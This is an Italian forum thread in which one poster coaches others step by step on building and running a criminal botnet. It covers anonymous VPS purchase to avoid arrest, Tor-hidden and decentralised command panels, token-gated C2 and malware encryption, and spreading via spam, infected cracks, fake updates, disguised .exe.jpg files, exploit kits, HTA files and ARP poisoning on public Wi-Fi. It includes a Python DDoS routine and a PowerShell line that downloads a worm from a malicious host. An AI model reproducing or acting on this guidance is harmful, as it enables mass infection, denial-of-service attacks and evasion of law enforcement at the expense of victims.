Domanda Dove acquistare VPS per creare una botnet?

Stato
Discussione chiusa ad ulteriori risposte.
la mia idea era quella di comprare tante vps piccole/modeste da tipo 1GB di ram e farle diventare parte della botnet. Secondo te può funzionare?
Secondo me si', puo' funzionare, ma sicuramente con poca potenza di calcolo, resta comunque una cosa limitata, anche se comunque come detto, la cosa piu' importante e' la banda, poi certo, serve anche la fluidita' e la potenza per poter mandare tanti pacchetti. Comunque si, funzionerebbe eccome, anche perche' tanto sicuramente sarebbero olto piu' potenti [parlando di netwrok, non di potenza] dei pc che magari infetti : uno in burundi infettato con velocita' di 2mbps , non ci fai nulla....
Alla fine penso che l'importante sia la banda di una VPS (forse sbaglio)
Come detto si, la cos importante e' a banda, ma anche la potenza di calcolo del pc infettato.
Per quale motivo servono macchine con tanta ram?
Diciamo che devi far girare il programma [un bel socket ascolta/manda delle info o dei comandi ........devi avere [intendo nella vps mater bot] un bel po' di ram per gestire il socket che riceve molte connessioni, che deve mandare e ricevere comandi, che deve essere magari sotto rete tor, che deve eseguire il tutto per 24h su 24.....
Comunque 32gb forse ho esagerato un po' [io intendevo a grandi vedute], ma se vuoi fare qualcosa di piu......limitato , anche 16 gb vanno bene, per quanto detto, poi il processore ormai e' xeon ...quindi puoi stare comunue tranquillo perhe' la ram se la gestisce bene [per quello che deve fare]
 
  • Mi piace
Reazioni: Anianded e Bart_
Domanda: nella guida che ho linkato prima il client bot funziona solo su Windows (bot.exe). Come potrei fare se lo volessi far funzionare anche su linux? Grazie

Inviato dal mio SM-G930F utilizzando Tapatalk
Dovresti convertire il rat da .exe a .sh [non nel modo banale che pensano molti su questo foum....] : dovresti riscriverlo usando o c e poi compilandolo per linux, oppure riscriverlo in un altro linguaggio supportato da ambedue le piattaforma: ad esempio python,c,go.......in questo modo ci fai un affarone.
Per quanto riguarda cio' , diciamo che bot.exe fa' cosi' : infetta la vittima e contatta il socket/il server attraverso get/post e gli dice:
"Bella, io sono entrato nel pc, ora se mi mandi i comandi io li eseguo per benino e ti riporto l output".
Detto cio' farlo in python sarebbe bellissimo e forse anche piu' semplice di farlo in c .........
 
  • Mi piace
Reazioni: Anianded e Bart_
- Da che siti posso reperire delle VPS da poter utilizzare nella botnet?
Per quanto riguarda comprare/avere delle VPS, la cosa migliore e' sicuramente adottare un pc in ufficio con modem forwardato lontano dalla propria citta' che funga da server; Non so' se hai anche saputo che di recente, parte degli attacchi informatici sono stati condtti anche da VPS amazon e google , in questo modo devi essere pero' molto bravo a non lasciare tracce, devi pagare con metodi abbastanza ifficili per non farti scoprire..... comunque sarebbe [almeno come restazioni] molto piu' economico e vantaggiosa una VPS google/amazon piuttosto che un tuo pc in un ufficio altrui con scarsa connessione.....come detto pero' devi stare attento a quando pagherai il tutto.
Che tool/programma/script posso utilizzare?
Allora, se ne vuoi gia' uno preconfezionato, ti basta cercare per qualche oretta su internet e ne trovi una buona; Le botnet migliori [magari cominci a cercare proprio da queste], sono sicuramente Zeus e vertexnet, di altre non ricordo il nome [o lameno momentaneamente]; Se invece vuoi crearlo tu un tool, allora ti dico che devi conoscere un po' di php [se vuoi fare un pannello web con richieste get/post], altrimenti puoi anche solo conoscere python e gia' puoi fare qualcosina: fai un socket su cui ricevere le info [socket di ascolto], lo fai in modo che possa mandare anche comandi [socket commands master], fai un db dal quale memorizzare i dati; Una buona idea sarebbe anche quella di configurara per TOR, in mdo da non essere subito riconoscibile ed in modo che anche tu sei piu' protetto [senno' quando vai a vedere la macchina, questa ti prende l IP e successivamente ti bannano la VPS [quindi diciamo che sotto questo punto di vista VPS altrui sono svantaggiose], infatti devi mandare attacchi potenti e diretti, perche' se fai qualcosa di grande, dopo 24h non solo ti hanno rimosso le VPS, ma ti hanno anche arrestato.
Per quanto riguarda la botnet in se', se vuoi qualcosa di piu' interessante, una bella visitatina del deep e trovi abbastanza source.
L' ultima parte della botnet, e' il vettore d' attacco : il client che tu mandi alle macchina per infettarle e per farle eseguire i comandi : farlo in python potrebbe essere un po' troppo .....banale/non funzionale/facimente smascherabile, comunque come inizio lo puoi fare, ma se poi vuoi fare qualcosa di piu' ....interessante, ti consiglio di farlo in c, o al massimo un linguaggio abbastanza diffuso e potente O che lavora a basso livello [vedi c,c++,vb,ecc...].
System Requirements di una VPS per poter essere utilizzata nella botnet?
Per quanto riguarda le specifiche di sistema consigliate : piu' alte sono meglio e' ...... , comunque una buona botnet dovrebbe essere performante [quindi un buon processore [tanto usano gli xeon ...]], tanta ram [minimo 32gb] e la cosa piu' importante: la connessione veloce e performante 25h/24 : se non hai traffico per gestire i bot e per mandare attacchi, puoi avere la cosa piu' bella del mondo ma non vai da nessuna parte.....proprio per questo ti coniglio amazon/google : processori intel xeon e ultra giga di velocita' internet.
spero di apprendere meglio il funzionamento e altre informazioni riguarda ad una botnet
emoji4.png
Per quanto riguarda cio' : penso che la pagina di wikipedia tu l abbia gia' letta..., quindi partimo dal presupposto che [senza spenderci troppe parole], la botnet e' un insieme di pc controllati da un bot master che impartisce i comandi da egffettuare; Tralasciamo la storia [per la prima volta fu' adottata da un ragazzetto come noi [o almeno penso tu sia ancora giovane ahaha], e diciamo che una botnet e' composta da:
  1. Interfaccia web
  2. Vettore di propagazione
  3. Software bot master per la gestione dei dispositivi
  4. Client di infezione [il file infetto che mandi]
Come detto, una botnet molto semplicemente segue questa procedura:
  • Vengono infettate delle vittime con il client attraverso social engineering, mail di massa, pubblicita' infettive e molto altro
  • Il client esegue la connessione al socket server che poi manda le info al tool del botmaster , il quale appunto va' a riportare il tutto ad un web panel/socket di amministrazione dei bot.
  • Il software e' corredato di un ampio "arsenale" di comandi gia' preimpostati, che serve per automatizzare il avoro di aprire tutti i 1000000 bot ed eseguire il comando "sysinfo" sulle macchina infette [oppure solo su alcune di queste].
  • Data la enorma potenza di calcolo che poi si raggiunge con una botnet, si puo' :
  1. Minare bitcoin o altre virtual money
  2. Fare attacchi dos/ddos
  3. Eseguire spam da adottare come vettore ulteriore di malware [vedi Avalanche]
Per eseguire attacchi DOS/DDOS, la cosa piu' importante e' sicuramente una buona connessione e un tool di dossing efficace.
Se stai pensando di uppare un dosser in ogni macchina, la cosa sarebbe dispendiosa, inoltre non servirebbe avviarne 1000 su una macchina perche' tanto il traffico e' quello.

Per altre info sono a tua disposizione;)
 
  • Mi piace
Reazioni: Bart_
Ho seguito interessato il post e le brillanti risposte di @Gorate che ringrazio (anche se non sono l'autore del post) di condividere il tuo sapere. Comunque, se puoi, mi daresti delle delucidazioni?



In questo caso cosa si fa se tu sconsigli di uppare lo script per gli attacchi dos ad ogni zombie?


Per il resto, ancora non mi è ancora chiara la parte tecnica della creazione e dialogo tra piattaforma di controllo e zombies. Allora, io mando in un modo o nell'altro un file che eseguito nella macchine vittime le infetta. Questa "infezione" di cui parliamo, cosa comprende? Semplicemente il file si annida nel pc e viene eseguito ad ogni avvio e serve da ascolto per i comandi che l'attaccante vuole impartire? Poi, come funziona la comunicazione tra attaccante e i membri della rete zombies? Mettiamo caso che l'attaccante vuole far partire un attacco ddos con tutti gli zombies della botnet. La comunicazione tramite che protocollo avviene? HTTP ne dubito, visto che è un protocollo limitato al word wide web. Quindi se non è HTTP, come impartiamo i comandi? Tramite che porta? In che modo?

Ultima cosa, per chi è alle prime armi e vuole esercitarsi semplicemente, si potrebbe anche evitare di fare un pannello php dove controllare i bot a distanza e fare il tutto semplicemente da riga di comando?
Grazie in anticipo!
Proseguiamo per passi: innanzitutto, grazie per i complimenti, ma a me piace questa "materia", quindi quando scrivo non mi fermo piu' lol.

Poi:

In questo caso cosa si fa se tu sconsigli di uppare lo script per gli attacchi dos ad ogni zombie?
Ti riporto il codice e ti spiego meglio:
Python:
   """
   Perform the attack on the specified target's port at the given time.
   """
   def attack(self, target, atkTime):
      atkTimeStr = Util.formatTimeMS(atkTime)

      print 'Going to attack Target @ %s:%d on ' \
         % (target[0], target[1]) + atkTimeStr + '\n'

      # account for the time difference between bot and master
      waitTimeMilSecs = long(atkTime) -  (Util.getCurrTime() + offset)

      if waitTimeMilSecs < 0:
         print 'Missed the attack :-('
         return

      print 'Sleeping for [msec]: ', waitTimeMilSecs

      # wait
      waitTimeSecs = float(waitTimeMilSecs)/1000
      time.sleep(waitTimeSecs)

      # wait complete, connect to target
      print 'Connecting to Target @ %s:%d...' % (target[0], target[1])
      targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      targetSocket.connect((target[0], target[1]))
      print 'Connected'

      # perform attack for 30 seconds
      startTime = time.time()
      timeout = 30
      print 'Attacking for', timeout, 'seconds...'
      while time.time() < startTime + timeout:
         time.sleep(rate) # send message every second
         Util.send(targetSocket, 'You\'re being attacked!!!')
      print 'Attack finished'

      targetSocket.close()

Questa e' la parte di una botnet in python "educativa" : io non cosniglio di uppare perche' maggiori precauzioni prese dopo un eventuale scoperta di essere stati infettati, potrebbe soltanto lasciare piu' tracce di cosa vogliamo fare, di cosa puntiamo e magari di noi stessi; Una buona prassi e' quella di integrare il "dosser" prprio all' interno del vettore di infezione in modo da evitare ulteriori problemi: se il tuo obbiettivo e' solo dossare e non fare null' altro, e' inutile lasciare tracce ed infettare con qualcosa che poi non sara' funzionale.
Il discorso cambia se invece la botnet la devi adottare piu' per "spionaggio" e solo eventualmente per ddos: in questo caso sarebbe bene creare un vettore di infezione che monitora le attivita' base della macchina infetta: esempio spento, accesso, connesso ad internet, che ora ha, timezone,cmd generale,upload e poc altro, poi adottare questo controllo "basico" della macchina per eseguire invece comandi piu' complessi attraverso delle estensioni, come quelle per gli screenshot, quelle per il ddos, quelle per il download di file da macchina ecc......

Questa "infezione" di cui parliamo, cosa comprende? Semplicemente il file si annida nel pc e viene eseguito ad ogni avvio e serve da ascolto per i comandi che l'attaccante vuole impartire?

Qunto detto prima penso sia' la intro: come detto e' meglio stabilire un contatto diretto con un vettore gia' "armato" se si ha intenzione di eseguire azioni automatizzate e non vuoi accesso alla macchina in se' [nel senso non vuoi fare screen,audio record ecc.....], quindi puntare subito al sodo; Mentre nel caso in cui vuoi fare piu' "attivita' di spionaggio" e non hai un' idea precisa in mente, lla cosa migliore e' creare un vettore con comandi base che eviti di farsi scoprire e che adotti per operazioni piu' complesse delle "estensioni".

Poi, come funziona la comunicazione tra attaccante e i membri della rete zombies?

Questo lo imposti tu: le 2 alternative piu' valide sono
  1. Attraverso richieste GET/POST e script php nel server di ricezione delle informazioni: in parole povere, sarebbe come dire di fare una cosa del genere:
    Python:
       non mi fa' postare nulla.....         command = requests.get(settings.SERVER_URL + "/api/pop?botid=" +id+infosistema+piattaforma+altri+dati
    , in questo modo dicimo proprio come succede con le credenziali di un sito, solo che non viene interrogato un db, ma la macchina stessa allega le informazioni che invia poi al master.
  2. Attraverso socket di ricezione delle info: in questo caso la cosa e' praticamente la stessa, solo che non funge tramite richieste get e post ma tramiteflussi di dati fra master bot e bot zombie.
Mettiamo caso che l'attaccante vuole far partire un attacco ddos con tutti gli zombies della botnet. La comunicazione tramite che protocollo avviene?

Allora, quello che hai detto e' impossibile lol, nel senso che mai tutti i bot di una botnet saranno attivi [almeno che non si usano dispositivi ioT]; Per quanto detto cio', si : le botnet si suddividono principalemnte in 3 modi: IRC, HTTP,HTTPS;
Le preferite [nel senso le piu' adottate] sono quelle HTTP: facili da usare, efficaci e piu' potenti di quelle IRC, piu' semplici da adottare delle HTTPS. Per quanto riguarda cio', poi ci sono vari attacchi ddos : udp, tcp ecc......., essi agiscono solo su alcuni protocolli, ma ti dico che HTTP e' il migliore [o almeno penso].
HTTP ne dubito, visto che è un protocollo limitato al word wide web. Quindi se non è HTTP, come impartiamo i comandi? Tramite che porta? In che modo?
Per quanto detto, si: HTTP, poi che significa "limitato al word wild web" ??? I comandi come detto vengono impartiti tramite accesso generale al cmd dei bot o tramite altri escamotage: questi li devi trovare tu progettatore, come mail contenenti comandi ecc......
La porta ecc...., lo decidi sempre tu con il vettore: ti cosngilio di dare un' occhiata a qualche source, ti schiarisce molto le idee, e sono abbastanza semplici dato che l' 80% dei comandi sono: sysinfo, ls, dir, GET_['info'] ecc....
Ultima cosa, per chi è alle prime armi e vuole esercitarsi semplicemente, si potrebbe anche evitare di fare un pannello php dove controllare i bot a distanza e fare il tutto semplicemente da riga di comando?
Grazie in anticipo!
Io sinceramente non vedo da difficolta', in quanto php dovresti sfruttare post/get, quindi per forza web developer, mentre come dici tu, si' si potrebbe fare con i socket: fai un socket di ascolto/master bot, con menu' ricorsivo per scegliere quali estensioni/comandi dare ed hai fatto.
Per altre info sono sempre qui
 
  • Mi piace
Reazioni: Anianded
Usa qBOT | Mirai se vuoi usare IoT
Usa amplification se non sai fare un pazzo
Usa HTTP se hai un crypter e traffico.
Non fare niente se sei uno script kiddie.
Lol, ma cosi' scoraggi la gente :kungfu::figurati::cucu: comunque, io consiglio di apprendere per bene il funzionamento delle botnet, poi analizzare per bene il codice di una delle grandi botnet: vedi athena http o ddos zeus [zeus fu' anche una botnet per stilare dati bancari] poi in un secondo momento provare a crearne una tutt propria, ma senza un esempio e senza comprendere come funge una cosa, e' inutile perdere tempo e risorse. Consiglio vivamente inoltre di tentare anche una semplice botnet con get/post : alla fine con pochi smeplici script in php ti fai qualcosa di indecente, ma almeno ne comprendi il funzionamento, poi per favore non fate come fanno molti : ma come faccio a settarlo in remoto ? : dico subito come cosi' nessuno fa' la solita domanda:

  • Ti affitti una vps no logs gestita da te stesso,
  • Setti tutto sotto TOR [sul forum ci sono 384827528 post su come far passare tutto sotto TOR]
  • Rendi il tutto con richieste get/post che sono migliori da gestire
  • Preferibilmente adottare sito onion con pannello di controllo integrato per evitare reversing di connessione che riportino direttamente a te
Inoltre, cominciate sempre da locale: subito da remoto non ci fate un tubo dato che non avete vittime e che il vettore di infezione e' abbastanza semplice [inizialmente]; Inoltre dovreste avere vps e molta pazienza, che verrebbero sprecate dato che potreste fare l' equivalente in locale [dato che se dovete dossar un pc in locale non forwardato non potete dato che non e' raggiungibile dai bot esterni alla vostra rete], ma almeno ci riuscite .................quindi in locale please:V:(

Aggiugo che la cosa migliore da inserire in primis in una botnet e' la shell comune; Poi tutto il resto, ma questa e' la cosa piu' utile dato che non penso vogliate aprire il terminale di ogni singolo target ed eseguire un comando........ripetendo questa prassi per tutti i pc che avete infettato: anche solo 2 io mi sarei scocciato di farlo lol

Si consiglia la creazione del tutto con moduli aggiuntivi se non si ha un obbiettivo primario: l' esecuzione di moduli e' la cosa piu' comoda, ordinata e semplice: bisogna sempre spartire in piccole parti un problema.....come in programmazione.

E poi il consiglio piu' importante: se avete 2 bot e state dossando il google, e quando ricaricate la pagina questa mostra l' errore "site down or control your connection" , seguite il secondo consiglio e scartate a priori il primo: non illudetevi, google non si puo' downare con 2 bot [neanche con 100], e neanche un qualsiasi altro sito con soli 2 bot.:addio::ehm: lol
Per altre info ci sono sempre [o per lo meno appena riesco a staccare un attimo]
 
  • Mi piace
Reazioni: Anianded
si occupa proprio di fare spreading di virus?
Si esatto: comunque si occupava.........e' stata resa down a maggio di quest' anno.
Come si fa per evitare che i client si connettano direttamente all'indirizzo pubblico del server? C'è un modo di farli connettere all'ipotetico server di controllo dei bot senza però utilizzare l'ip del server? Sotto tor è possibile in qualche modo? Se si, come? O ci sono altri metodi più efficaci e semplici?
Allora, qui la cosa si fa' molto complicata:

innanitutto appena apri un collegamento con un client, cerca un modo per criptare la connessione. Leggendo di alcune botnet, ho letto che i proprietari cambiavano DNS almeno una volta al giorno ................cio' richiede pero' un grnade dispendio in termini sia capacitativi sia economici........, un metodo piu' semplice sarebbe quello di adottare un pannello decentralizzato: piu' pannelli secondari che fanno capo ad un pannello principale: ogni pannello principale con solo qualche bot, in modo da evitare che se viene messa down ti arrestano del tutto la botnet.
Inoltre, per evitare che risalgano direttamente a te, oltre a criptare, io userei un plugin nel vettore di attacco intercambiabile ed aggiornabile su tutti i pc in tempo reale attraverso una serie di comandi automatizzati nella shell generale; In questo modo potresti avere la possibilita' di cambiare piu' volte il tuo dominio, magari sfruttado qualche marchingegnio, ma questo lo devi trovare tu............io ti consiglio di riflettere sul kill switch con uso opposto.....................altro dirti non vo' .
Una cosa molto importante e' inoltre l' anonimato: servizio su siti onion, con triplo login [se vuoi] in modo da evitare che tutti usufruiscano della tua botnet...e magari anche un metodo di evasione, magari attraverso un finto log che riporta ad un sito down.

Per il resto, potresti anche sfruttare servizi come no-ip in modo automatizzato per creare vari hostname per il tuo ip, ma non servirebbe a nulla dato che ricondurrebbe inevitabilmente a quest' ultimo.

Se hai altre domande siamo sempre qui!
 
  • Mi piace
Reazioni: Anianded
Esistono ancora servizi del genere?
Da quel che mi risulta , ufficialmente NO, ma chissa' quanti ce ne sono nascosti [magari sono falsi], ma chissa' quanti ............comuque uno potrebero pure occuparsi dello spread solo in seguito e di proprio: usi il tutto con le tecniche tradizionali e poi adotti una vulnerabilita'/tecnica particolare per incrementare i bot, comunque posso dirti con sicurezza che prima di usare falle ecc........, dovresti avere gia' una bella base da cui solo dopo cominciare a mandare in giro il worm....

Di che DNS si sta parlando?
Dei DNS del server: Il sistema dei nomi di dominio (in inglese: Domain Name System, DNS), è un sistema utilizzato per la risoluzione di nomi dei nodi della rete (in inglese: host) in indirizzi IP e viceversa. Il servizio è realizzato tramite un database distribuito, costituito dai server DNS.
In questo modo apena uno cambia il DNS, sembra che il sito non sia mai esistito, e il tutto cambia qualsiasi file di controllo di locazione, quindi diciamo che questa e' la scelta fatta da grnadi botnet del passato: da Necrus, a Zeus ad AlfaBot e cosi' via..................

Si, avevo pensato anch'io a questo, ma io chiedevo i metodi più semplici e immediati:ehm::asd: quindi cosa mi consigli?
Consiglio di criptare la comunicazione, di evitare di lasciare tracce e provare con la tecnca del pivoting per le infezioni .............inoltre per nascondere i server, se non acquisti DNS o se non hai una rete decentralizzata, la cosa piu' importante e' usare un "ponte" da tramite per filtrare le connessioni: esempio se passano sulla porta del malware ok, senno' nisba; Oppure se e' presente un browser [prova con il rilevamento di user-agent/cookie/plugin], ti manda ad una porta chiusa;
Io ti consiglierei inoltre di creare una richiesta al server con una specie di token che varia da macchina amacchina, in questo caso se la macchina infetta non passa come parametro il token, quindi non si esegue un ping per trovare il bot master, ma il server, si cestina la richiesta. Ricorda che comunque per evitare casini, cripta bene il codice del malware................che contiene dove connettersi, e anche evita che sia visibile e prova a camuffare le connessioni che avvengono: prova una botnet con moduli in locale in modo da evitare connessioni "dirette" che lasciano piu' tracce: magari accedi una sola volta, carichi il modulo ddos [se vuoi che la botnet sia per dossing], carichi gli script di automazione che runnano il necessario ogni tot di tempo: cosi' eviti di connetterti per ogni singolo comando singolo...........

Ora che ci penso: tu dicevi socket botnet, quindi valgono tutte le cose tranne un login ................dovresti proteggere il file con una password piuttosto articolata per evitare che l' accesso al server porti al conseguente riutilizzo del tool..............Per evitare qualsiasi inghippo, consiglio proprio di usare un sistema torrificato, di accedere tramite tor e di cancellare qualsiasi traccia: dal login alla cache; Inoltre consiglierei di inserire molti controlli all' inizio per evitare intrusioni: magari disattiva servizi come ssh o simili che mettono a repentaglio l' incolumita' del server e del tuo tool.
 
  • Mi piace
Reazioni: Anianded
per usare tecniche tradizionali intendi: spam email e crack infette su torrent e youtube?
Si: da download infetti, ad email di spam, a siti "contaggiati" che poi servono per propagare ancora il worm o semplicemente che hostano applet infetti ..........js malevoli od altre web app malevoli che appena uno ci va' sopra, viene infettato.

vedi esempio: vittima ------------sito infettato -----------[redirect] -----------malicious site with exploit kit or malicious web app

Altre tecniche poi potrebbero essere l' utilizzo di ads non autorizzati conteneti malware in js, la propagazione tramite falle scoperte: come detto ancora il 70% del mondo [anche dopo gli attacchi di NotPetya e Wannacry], non ha ancora aggiornato la versione di windows con la relativa patch ...........

Altri metodi ancora potrebbero essere fake updates di applicazioni : sempre infettando siti vecchiotti che magari offrivano download di un file, lo rimpiazzi con il tuo file malevolo e poi mandi una mail a tutti coloro che si erano registrati per scaricare il file dicendo: "aggiornata a tua stupenda applicazione, passa al nuovo uodate !!!" ;
Oppure attraverso propagazione in rete da locale [cosa fantastica perche', come gia' detto infetti il pc di una universita' e li infetti tutti]: vedi https://wikileaks.com/vault7/#Archimedes e fatti un' idea.
Oppure attraverso la condivisione di files con malware incorporato: "ciao, guarda che carina questa immagine [con estensione .exe.jpg ......], incorpori la foto di un gattino con un exe backdoor o batch file ed hai risolto ogni tuo problema, anci per far ancora meglio ed evitare rilevamento del fie come malevolo, potresti porvare con incorporarvi uno script in powershell che downloada il file dall' host malevolo, e' una cosa del genere:

Codice:
powershell.exe Invoke-WebRequest -Uri "maicioussite/worm.exe" -OutFile "C:\path\non_sono_un_virus.exe"
.

Un altro metodo sarebbe quello per script a 2 parti: sono dei semplici downloader che se aperti downloadano ed autorannano il file scaricato dopo molti controlli [cercano di disattivare l' antivirus od altro] , ma per lo piu' delle volte, anche i file hta che richiedono l' approvazione per il run [questo in siti infettati da te dov inserisci il file hta infetto] sono molto pericolosi.
Un ultimo metod sarebbe quello per "comune" : vai nel bar del comune con la bellissima e [non] protettisiima wifi libera; Injecti nel traffico dei pc collegati il worm che poi lo trasmetteranno nella loro casa e cosi' via .
 
  • Mi piace
Reazioni: Anianded
Perfetto ora ho capito, ti continuo a ringraziare per l'enorme curiosità che mi stai togliendo. Ritornando a tor, ora mi è più chiaro, devono essere i bot che devono connettersi tramite tor al server. Il problema è: come fare? Molto spesso tor non è installato nei sistemi, e in quel caso che si fa?

Si', ora dico, ma una cosa : tu parli di una botnet socket o di una con richieste get/post ?

Nel caso di una botnet socket, il pannello di controllo e' un socket che fa' passare tutte le sue richieste sotto TOR ed e' hostato su una VPS torrificata .............per far si' che i client vi si connettano, o fai in modo di avere un pannello decentrlizzato :
tanti pannelli nel clear web con pochi bot che fanno capo ad un pannello principale torrificato al quale solo tu accedi per dare i comandi che poi ricevono i pannelli secondari che poi manderanno i relativi comandi [il tutto in piu' VPS] in modo che il problenma tor non si ponga, ma che tu sia sempre irrintracciabile:

schema esempio:
pannello principale sotto TOR -------[manda comando] ----------pannello secondario in clear web ----------bot

senno', se vuoi un unico pannello sotto TOR, o adotti il worm con implementazione proxy : quindi si connette in automatico ad un proxy TOR per connettersi poi al server.
La cosa bella e' che se vuoi farlo con socket, la cosa diviene piu' semplice rispetto a quella con get/post in quanto le richieste potrebbero essere in qualche modo compromettenti.
 
  • Mi piace
Reazioni: Anianded
Quando si parla di integrare in un sito malevolo codice js o exploit kit, come si fa
Allora, in sostanza un exploit kit e' un kit che sfrutta vulnerabilita' [spesso ancora non patchate : 0day perche' si hanno 0 giorni per patcharle altrimenti succede un casino] per injectare codice malevolo all' interno del browser della vittima, all' interno di un plugin affetto da vulnerabilita' od eventualmente nello stesso sistema. Questi exploit kit sono inseriti all' interno di un sito "zombie" che puo' avere 2 funzioni:
  1. Inizialmente potrebbe hostare di suo l' exploit kit
  2. Ma si preferisce usare questi siti zombie come redirecter [redirect vero e proprio oppure tramite iframe per evitare un contatto diretto fra vittima e sito malevolo] che poi riporta al sito attacker che contiene non 1, ma 3/4/10/50 applicativi infetti e codici che servono a sfruttare in ogni modo possibile ed inimmaginabile le falle nei sistemi.
Se vuoi un consiglio, cerca su google "Beef + armitage botnet" : ora ti spiego meglio cosa e' e come funge, ma intanto ti dico che quello e' un esempio quasi perfetto di botnet [anche se piu' da studio che da uso reale, ma e' ottima per capire la dinameica degli exploit kit e delle botnet , nel senso di come lavorano......]; Beef hook e' un software che serve , attraverso un lin infetto a riportare la vittima in un vero e proprio host di exploit kit, e dal pannello si possono lanciare attacchi, ma anche moduli post-exploiting; Integrando beef con armitage, famosa interfaccia grafica di metasploit, puoi riuscire a sfruttare i 2 tool [come detto sono buoni per capire le dinamiche, ma non per uso reale].
O meglio cosa si può arrivare a fare con il solo ausilio dei js?
Bhe, calcola che qualche annetto fa' usci' il primo ransomware in js ................puro..........................
Conta che js e' ormai nel 93% dei dispositivi di tutto il mondo, e conta che i framework che lo caratterizzano lo hanno fatto diventare non piu' un linguaggio di script [per il quale invece nacque : java script], ma un vero e proprio linguaggio di programmazione;
Poi naturalemnte js e' usato come vettore per eseguire altre operazioni che magari invece sfruttano applet java, vulnerabilita' nel pdf viewer [scritto in js] od altro per entrare nel sistema.
Ma js come detto non e' il vettore principale, ma il tramite in moltissime occasioni:

esempio:
vulnerabilita' plugin installati
|
|
browser vittima ----------sito con js malevolo -----------------exploit kit ----------------sfrutta vulnerabilita' del browser nell' esecuzione di codice |
|
vulnerabilita' di altra natura


: [significa il tutto viene adottato] inject codice nel sistema target
 
  • Mi piace
Reazioni: Anianded
SI può arrivare ad eseguire il file direttamente nel pc della vittima?
Come detto potrebbe anche remotamente accadere [ad esempio con una vulnerabilita' nel pdf viewer potresti injectare una macro che poi viene eseguita direttamente dal sistema], ma e' molto remoto come caso.
Al massimo si injecta codice che poi si runna, ad esempio ti installa da solo un estensione maligna [vedi quelo che ti ho detto: "beef+armitage botnet " e trovi pure le estensioni maligne lol] che magari poi downloada il file dal server, che ti redirecta sull' exploit kit od altro: i modi sono migliaia, ma come detto diciamo che js e' adottato piu' come metodo di "trasporto"/mezzo che principale infezione.
E poi, gli exploit kit (parlo del lato web-client) sono fatti prevalentemente di codice js?
Nono, non fraintendiamo: un exploit kit e' quell' insieme di script/web app infette od altro che servono per infettare il maggior numero possibile di vitime; Puo' essere scritto pure in jvebhjbe, ma l' importante e' che rispetti la regola principale: infettare.
Js come detto e' comodo perche' installato praticamente su tutti i dispositivi, e quindi e' ben visto per usarlo come mezzo, ma come detto prima poche volte e' l' artefice di tutto.
Tu parli di "injectare" il worm in una wifi libera... Ma in che senso "injectare"? In che modo?
Per injectare un worm nella wifi, o adotti un fake point access: praticamente crei una tua wifi dove poi modifichi il contenuto html delle pagine che visitano le vittime, e magari inserisci un iframe sull exploit kit o forzi un azione;
Oppure esegui arp poisoning e di conseguenza redirecti tutti su una pagina che dice: " vai al sito tot per far rifunziare la wifi" oppure "scarica il file ed avvialo per poter finalmnte usare la wifi" : consiglio l' esecuzione di hta file malevoli che sono di molto effetto.
 
  • Mi piace
Reazioni: Anianded
Grazie mille, chiarissimo come sempre, sei diventato il mio mentore lool. Comunque, una piccola domanda, hai detto che la combinazione beef + armitage è buona per capire la dinamica degli attacchi ma non per uso reale, perché?
E' buona per capire come sia organizzato un exploit kit [beef hook], mentre armitage per sfruttare le varie vuln all' interno del suo database [che in realta' sarebbe metasploit: armitage e' solo la gui grafica in java].
Non e' ottimo per uso reale in quanto essendo adottato da tutti, ed essendo open source, i payload sono rilevabili ormai da 3 anni minimo; Inoltre le tecniche che usano sono abbastanza vecchiotte, e i moduli non sempre funzionano a dovere;
Inoltre per un uso reale, oltre alla NON rilevabilita' , serve maneggevolezza [che in questo caso beef ha], ma serve anche un pannello di controllo che non riporti direttamente a noi [cosa che accade con armitage/metasploit], quindi anonimita' e rilevabilita' [2 cose importantissime ], mancano in questo contesto.
Con questa combinazione potrai capire quindi:

con beef hook come lavora un exploit kit
con armitage integration, come sfruttare ed amministrare una botnet e usare varie vuln per poter ottenere l controllo dei pc
 
  • Mi piace
Reazioni: Anianded
Riguardo il "vai al sito tot per far rifunzionare la wifi", cosa posso arrivare a fare senza far necessariamente scaricare e aprire il file client dei bot? C'è la possibilità, per l'attaccante, di far joinare bot solo attraverso un redirect senza download e apertura del file? Al di là di vuln varie... Io dico in generale se si può fare.. Perchè è ovvio che per uno come te sfuttare o trovare vuln sia una cosa fatta e rifatta, ma per uno alle prime armi che vuole imparare queste dinamiche di attacco e come difendersi da esse, punta su cose più basilare per poi passare mano a mano a cose più complesse
Le tecniche che ti ho appena elencato, sono molto basiliari: ci sono vari tool su kali linux che ti permettono di fare cio' , uno tra tanti ettercap, ma ce ne sono molti altri.
Per quanto dici, non ho capito bene: forse intendi che per fare cio' che ti ho detto [quindi redirect su pagina con messaggio], senza infettare il target?
Se la domanda e' questa, si' :come detto si tratta solo di redirectare forzatamente il target: vedi "arp poisoning ettercap" od "replace html with other kali" e troverai molto materiale: in 3 minuti fai un arp poisoning lol.
Poi comunque io sono un nabbo in confronto a molti altri di questo forum: il forum mi ha aiutato a crescere, poi comunque non faccio nulla di che con le vulnerabilita' : a massimo exploito il pc dell' ufficio di mio padre per poter vedere se riceve le mie mail lol.
Per quanto riguarda un infezione senza download o redirection, non penso in quanto ci deve essere un vettore, e levando questi 2, la strada si chiude drasticamnete: la cosa importante non e' con quale tecnica infetti, ma come la effettui, ricordalo ed avrai il mondo spalancato a te!!!
Se hai altre domande o se ho capito male sono subito qui ;)
 
  • Mi piace
Reazioni: Anianded
Ahahahhahah grazie mille ancora!! Comunque mi sa che hai capito male.. Io so bene che si può fare MITM e redirectare chiunque dovunque. Volevo solo sapere se semplicemente redirectando su un sito malevolo, senza scaricare o aprire nessun file ma solo andando su quel sito, si poteva in qualche modo infettare la vittima (come se stesse aprendo il file client dei bot che le injecta, anche se inr ealtà niente è stato scaricato e niente è stato aperto)... O a limite, magari se non è possibile fare quello che ho chiesto, si può autoscaricare un file e autorunnarlo dal browser se si va su un sito infetto?
Sisi, lo abbiamo detto fino ad ora con gli exploit kit....................
Ad esempio se inserisci un applet java infetto in una pagina web, appena qualcuno la andra' ad aprire, gli comparira' la scritta "enable java on browser", e naturalmente se qualcuno clicca " si' ", il codice infetto sara' eseguito direttamente, senza che debba scaricare od aprire qualcosa, ma semplicemnte attivando java nel browser [da notare che nella schermata di java install c'e' scritto con fierezza: 3 bilion of devices run with java ................" quindi non ci sono problemi di incompatibilita' lol
Un altro metodo e' quello di injection di codice js: un esempio:
vai su un sito che contiene un pdf e lo apri da browser con pdf viewer; cosi' non lo scarichi, ma lo stai solo visualizzando; Una falla nel pdf viewer, potrebbe acconsentire a runnare codice infetto nella macchina senza che nessuno scarichi nulla.
